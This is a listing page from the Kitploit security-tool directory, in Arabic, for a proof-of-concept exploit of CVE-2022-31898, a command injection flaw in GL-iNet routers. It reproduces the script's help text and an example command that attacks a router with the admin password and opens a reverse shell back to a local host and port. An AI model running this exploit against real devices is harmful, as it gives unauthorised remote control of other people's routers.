Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2022-31898 — استغلال إثبات المفهوم لثغرة CVE-2022-31898، وهي ثغرة حقن أوامر في أجهزة توجيه GL-iNet (البرنامج الثابت < 3.215). يوفر قشرة عكسية عبر HTTP/HTTPS مع مصادقة قابلة للتكوين. | Kitploit
أدوات/GitHubGitHub/gigaryte/cve-2022-31898
أمان إنترنت الأشياءتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubgigaryte/cve-2022-31898

cve-2022-31898

استغلال إثبات المفهوم لثغرة CVE-2022-31898، وهي ثغرة حقن أوامر في أجهزة توجيه GL-iNet (البرنامج الثابت < 3.215). يوفر قشرة عكسية عبر HTTP/HTTPS مع مصادقة قابلة للتكوين.

عرض المستودع
1853منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

cve-2022-31898

كود إثبات المفهوم (POC) لاستغلال CVE-2022-31898، وهو حقن أوامر في أجهزة توجيه GL-iNet ذات البرامج الثابتة الأقدم من 3.215

الاستخدام

root@kitploit:~
./cve-2022-31898.py -h
usage: cve-2022-31898.py [-h] -R RHOST [-P RPORT] -L LHOST [-l LPORT] [-p PWD] [-t]

options:
  -h, --help            show this help message and exit
  -R RHOST, --rhost RHOST
                        IP/hostname of Mango router
  -P RPORT, --rport RPORT
                        Port to connect to Mango router on
  -L LHOST, --lhost LHOST
                        Local host/IP for reverse shell to connect back to
  -l LPORT, --lport LPORT
                        Local port for reverse shell to connect back on
  -p PWD, --pwd PWD     Password to use to log in
  -t, --https           If set, use HTTPS

مثال

استغلال جهاز توجيه GL-iNet عند 192.168.8.1 عبر HTTPS والاتصال مرة أخرى بالجهاز المحلي عند 192.168.8.123:8008 باستخدام كلمة مرور المسؤول password:

root@kitploit:~
./cve-2022-31898.py -R 192.168.8.1 -P 443 -L 192.168.8.123 -l 8008 -p password -t
تنزيل الأداة